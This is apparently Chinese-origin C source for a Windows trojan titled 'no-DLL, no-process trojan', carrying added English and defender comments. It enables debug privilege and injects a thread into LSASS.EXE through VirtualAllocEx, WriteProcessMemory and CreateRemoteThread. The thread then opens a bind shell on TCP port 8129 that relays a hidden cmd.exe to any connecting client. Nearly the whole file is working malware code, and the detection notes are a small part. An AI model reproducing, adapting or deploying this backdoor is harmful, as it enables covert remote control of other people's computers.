无dll无进程木马


#include<windows.h>
//#include<winsock2.h>
#include <Shlwapi.h>
#include <tlhelp32.h>

#pragma comment(lib,"Shlwapi.lib")

//参数结构 ;
// Parameter block that WinMain fills in locally and copies into the target
// process. Every dw* field is a function address resolved by GetProcAddress
// in the injecting process and stored as a 32-bit DWORD; the injected thread
// calls through these instead of importing anything by name. The char arrays
// carry the strings the thread needs. Several fields are resolved but never
// used by ThreadProc (noted below).
typedef struct _RemotePara{
   DWORD dwLoadLibrary;      // kernel32!LoadLibraryA - used to load winsockDll
   DWORD dwFreeLibrary;      // kernel32!FreeLibrary - resolved, never called
   DWORD dwGetProcAddress;   // kernel32!GetProcAddress - resolved, never called
   DWORD dwGetModuleHandle;  // kernel32!GetModuleHandleA - resolved, never called
   DWORD dwWSAStartup;       // wsock32 entry points, all used by the relay
   DWORD dwSocket;
   DWORD dwhtons;
   DWORD dwbind;
   DWORD dwlisten;
   DWORD dwaccept;
   DWORD dwsend;
   DWORD dwrecv;
   DWORD dwclosesocket;
   DWORD dwCreateProcessA;   // kernel32 process/pipe APIs for the redirected child
   DWORD dwPeekNamedPipe;
   DWORD dwWriteFile;
   DWORD dwReadFile;
   DWORD dwCloseHandle;
   DWORD dwCreatePipe;
   DWORD dwTerminateProcess; // resolved, never called: the child is not killed

   DWORD dwMessageBox;       // user32!MessageBoxA - the only call site is commented out
   char strMessageBox[12];   // text for that MessageBoxA call
   char winsockDll[16];      // DLL name passed to LoadLibraryA inside the target
   char cmd[10];             // command line handed to CreateProcessA
   char Buff[4096];          // shared I/O buffer for pipe<->socket transfers
   char telnetmsg[60];       // banner; its send() is commented out

}RemotePara;

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 提升应用级调试权限
DWORD GetPidByName(char *szName); // 根据进程名称得到进程ID

// 远程线程执行体
// Thread body that WinMain copies, as raw bytes, into the target process and
// starts with CreateRemoteThread. It runs there without a module of its own,
// so every API it needs arrives as an address in *Para.
// Behaviour, in order: load the winsock DLL named in Para->winsockDll, listen
// on TCP port 8129 on all interfaces, accept one client, spawn Para->cmd with
// its stdio redirected through two anonymous pipes, then relay bytes between
// the socket and those pipes until either side fails. Net effect: a bind
// shell hosted inside the injected process.
// Defender notes: the observable artefacts are an unexpected listening socket
// owned by the host process, a child process created by it with a hidden
// window and redirected standard handles, and anonymous-pipe creation in a
// process that normally does none of these. The child is never terminated
// here, so it outlives the connection.
DWORD __stdcall ThreadProc(RemotePara *Para){
 WSADATA WSAData;
 SOCKET listenSocket, clientSocket;
 struct sockaddr_in server_addr, client_addr;
 int iAddrSize = sizeof(client_addr);
 SECURITY_ATTRIBUTES sa;                 // passed to CreatePipe below; never initialised here
 HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;
 STARTUPINFO si;
 PROCESS_INFORMATION ProcessInformation;
 unsigned long lBytesRead = 0;

 // Signatures for the loader-related pointers; only LoadLibraryFunc is called.
 typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
 typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
 typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
 typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

 // Untyped function pointers; each is called with whatever argument list the
 // real API takes, so there is no compile-time checking on these calls.
 FARPROC PMessageBoxA;
 FARPROC PWSAStartup;
 FARPROC PSocket;
 FARPROC Phtons;
 FARPROC Pbind;
 FARPROC Plisten;
 FARPROC Paccept;
 FARPROC Psend;
 FARPROC Precv;
 FARPROC Pclosesocket;
 FARPROC PCreateProcessA;
 FARPROC PPeekNamedPipe;
 FARPROC PWriteFile;
 FARPROC PReadFile;
 FARPROC PCloseHandle;
 FARPROC PCreatePipe;
 FARPROC PTerminateProcess;

 PLoadLibrary LoadLibraryFunc             = (PLoadLibrary)Para->dwLoadLibrary;
 PGetProcAddress GetProcAddressFunc       = (PGetProcAddress)Para->dwGetProcAddress;
 // NOTE: reads dwLoadLibrary, not dwFreeLibrary; FreeLibraryFunc is never
 // called below, so this has no effect.
 PFreeLibrary FreeLibraryFunc             = (PFreeLibrary)Para->dwLoadLibrary;
 PGetModuleHandle GetModuleHandleFunc     = (PGetModuleHandle)Para->dwGetModuleHandle;

 // Load the winsock DLL inside the host process before its entry points are used.
 LoadLibraryFunc(Para->winsockDll);

 PWSAStartup   = (FARPROC)Para->dwWSAStartup;
 PSocket       = (FARPROC)Para->dwSocket;
 Phtons        = (FARPROC)Para->dwhtons;
 Pbind         = (FARPROC)Para->dwbind;
 Plisten       = (FARPROC)Para->dwlisten;
 Paccept       = (FARPROC)Para->dwaccept;
 Psend         = (FARPROC)Para->dwsend;
 Precv         = (FARPROC)Para->dwrecv;
 Pclosesocket  = (FARPROC)Para->dwclosesocket;
 PCreateProcessA    = (FARPROC)Para->dwCreateProcessA;
 PPeekNamedPipe     = (FARPROC)Para->dwPeekNamedPipe;
 PWriteFile         = (FARPROC)Para->dwWriteFile;
 PReadFile          = (FARPROC)Para->dwReadFile;
 PCloseHandle       = (FARPROC)Para->dwCloseHandle;
 PCreatePipe        = (FARPROC)Para->dwCreatePipe;
 PTerminateProcess  = (FARPROC)Para->dwTerminateProcess;   // never called

 PMessageBoxA       = (FARPROC)Para->dwMessageBox;         // only use is commented out

 // Winsock 1.1 ((1<<8)|1); result not checked.
 PWSAStartup((WORD)((1<<8)|1), (LPWSADATA)&WSAData);
 listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
 if(listenSocket == INVALID_SOCKET)return 0;

 // Hard-coded listener: TCP 8129 on every interface.
 server_addr.sin_family      = AF_INET;
 server_addr.sin_port        = Phtons((unsigned short)(8129));
 server_addr.sin_addr.s_addr = INADDR_ANY;

 if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
 if(Plisten(listenSocket, 5))return 0;
 // Blocks until one client connects; the returned socket is not validated.
 clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
// Psend(clientSocket, Para->telnetmsg, 60, 0);

 // Pipe 1 carries the child's stdout/stderr back here; pipe 2 feeds its stdin.
 if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
 if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;

 ZeroMemory(&si,sizeof(si)); // ZeroMemory is a C runtime function and can be called directly (original author's note)
 si.dwFlags     = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
 si.wShowWindow = SW_HIDE;                   // child gets no visible window
 si.hStdInput   = hReadPipe2;
 si.hStdOutput  = si.hStdError = hWritePipe1;

 // bInheritHandles=1 so the child receives the pipe ends set in si.
 if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;
 // Relay loop: poll the child's output with PeekNamedPipe; if bytes are
 // pending, read them and send to the client, otherwise block in recv and
 // forward the client's input to the child's stdin. Exits on any failure.
 while(1) {
  memset(Para->Buff,0,4096);
  PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);
  if(lBytesRead) {
   if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;
   if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;
  }else {
   lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);
   if(lBytesRead <=0 ) break;
   if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;
  }
 }

 // Close pipe ends and sockets; the spawned child process is left running.
 PCloseHandle(hWritePipe2);
 PCloseHandle(hReadPipe1);
 PCloseHandle(hReadPipe2);
 PCloseHandle(hWritePipe1);
 Pclosesocket(listenSocket);
 Pclosesocket(clientSocket);

// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);

 return 0;
}

// Injector entry point. Raises SeDebugPrivilege on its own token, locates
// LSASS.EXE, allocates an RWX region there, copies 4 KiB starting at
// ThreadProc into it, fills a RemotePara with API addresses resolved in this
// process, copies that too, and starts ThreadProc in LSASS with
// CreateRemoteThread. This process then exits; only the remote thread remains.
// Defender notes: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
// WriteProcessMemory -> CreateRemoteThread against lsass.exe is the canonical
// remote-thread injection chain (Sysmon Event ID 8, EDR cross-process
// telemetry). Running LSA as a protected process (RunAsPPL) denies the
// PROCESS_ALL_ACCESS open, which stops this at line 175 before any write.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 const DWORD THREADSIZE=1024*4;      // bytes copied from ThreadProc, regardless of its real length
 DWORD byte_write;                   // actually receives the new thread id (last arg of CreateRemoteThread)
 void *pRemoteThread;                // RWX region in the target holding the copied code
 HANDLE hToken,hRemoteProcess,hThread;
 HINSTANCE hKernel,hUser32,hSock;
 RemotePara myRemotePara,*pRemotePara;
 DWORD pID;

 // Enable SE_DEBUG_NAME on this process's token; neither call's result is checked.
 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
 EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

 // Obtain a handle to the target process with PROCESS_ALL_ACCESS.
 pID = GetPidByName("LSASS.EXE");
 if(pID == 0)return 0;
 hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
 if(!hRemoteProcess)return 0;

 // Allocate executable+writable memory in the target's address space.
 pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 if(!pRemoteThread)return 0;

 // Copy 4 KiB of raw machine code starting at ThreadProc into the target;
 // whatever follows ThreadProc in this image is copied along with it.
 if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0;
 
 // Zero the block so the strcat calls below append to empty strings.
 ZeroMemory(&myRemotePara,sizeof(RemotePara));
 // Resolve API addresses in this process and store them as 32-bit values.
 // NOTE(review): this only works in the target if the same DLLs are mapped
 // at the same base there and the build is 32-bit - presumably the
 // environment the author assumed; a 64-bit pointer would be truncated.
 hKernel = LoadLibrary( "kernel32.dll");
 myRemotePara.dwLoadLibrary      = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
 myRemotePara.dwFreeLibrary      = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
 myRemotePara.dwGetProcAddress   = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
 myRemotePara.dwGetModuleHandle  = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");

 myRemotePara.dwCreateProcessA     = (DWORD)GetProcAddress(hKernel, "CreateProcessA");
 myRemotePara.dwPeekNamedPipe      = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");
 myRemotePara.dwWriteFile          = (DWORD)GetProcAddress(hKernel, "WriteFile");
 myRemotePara.dwReadFile           = (DWORD)GetProcAddress(hKernel, "ReadFile");
 myRemotePara.dwCloseHandle        = (DWORD)GetProcAddress(hKernel, "CloseHandle");
 myRemotePara.dwCreatePipe         = (DWORD)GetProcAddress(hKernel, "CreatePipe");
 myRemotePara.dwTerminateProcess   = (DWORD)GetProcAddress(hKernel, "TerminateProcess");

 // Socket entry points come from wsock32.dll (not ws2_32).
 hSock = LoadLibrary("wsock32.dll");
 myRemotePara.dwWSAStartup   = (DWORD)GetProcAddress(hSock,"WSAStartup");
 myRemotePara.dwSocket       = (DWORD)GetProcAddress(hSock,"socket");
 myRemotePara.dwhtons        = (DWORD)GetProcAddress(hSock,"htons");
 myRemotePara.dwbind         = (DWORD)GetProcAddress(hSock,"bind");
 myRemotePara.dwlisten       = (DWORD)GetProcAddress(hSock,"listen");
 myRemotePara.dwaccept       = (DWORD)GetProcAddress(hSock,"accept");
 myRemotePara.dwrecv         = (DWORD)GetProcAddress(hSock,"recv");
 myRemotePara.dwsend         = (DWORD)GetProcAddress(hSock,"send");
 myRemotePara.dwclosesocket  = (DWORD)GetProcAddress(hSock,"closesocket");

 hUser32 = LoadLibrary("user32.dll");
 myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA");

 // Strings the remote thread uses (DLL name, command line, banner, message).
 strcat(myRemotePara.strMessageBox,"Sucess!//0");
 strcat(myRemotePara.winsockDll,"wsock32.dll//0");
 strcat(myRemotePara.cmd,"cmd.exe//0");
 strcat(myRemotePara.telnetmsg,"Connect Sucessful!//n//0");
 
 // Second allocation in the target (read/write only) for the parameter block.
 pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);
 if(!pRemotePara)return 0;
 if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;

 // Start the copied code in the target with the parameter block as its argument.
 hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
 
 // Local cleanup; hThread is neither waited on nor closed.
 FreeLibrary(hKernel);
 FreeLibrary(hSock);
 FreeLibrary(hUser32);
 CloseHandle(hRemoteProcess);
 CloseHandle(hToken);

 return 0;
}

// Enables (fEnable != 0) or disables one named privilege on hToken; WinMain
// uses it to turn on SE_DEBUG_NAME before opening LSASS.
// Returns TRUE only if GetLastError() reads ERROR_SUCCESS after
// AdjustTokenPrivileges. AdjustTokenPrivileges can return TRUE and still set
// ERROR_NOT_ALL_ASSIGNED when the token does not hold the privilege, so the
// GetLastError() check is what reports that case. The LookupPrivilegeValue
// result is not checked.
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){
 TOKEN_PRIVILEGES tp;
 tp.PrivilegeCount = 1;
 LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
 tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
 AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
 return((GetLastError() == ERROR_SUCCESS));
}

DWORD GetPidByName(char *szName)
{
 HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
 PROCESSENTRY32 pe32={0};
 DWORD dwRet=0;
 
 hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;
 
 pe32.dwSize = sizeof(PROCESSENTRY32);
 if(Process32First(hProcessSnap, &pe32))
 {
  do
  {
   if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)
   {
    dwRet=pe32.th32ProcessID;
    break;
   }
  }while (Process32Next(hProcessSnap,&pe32));
 }
 else return 0;
 
 if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
 return dwRet;
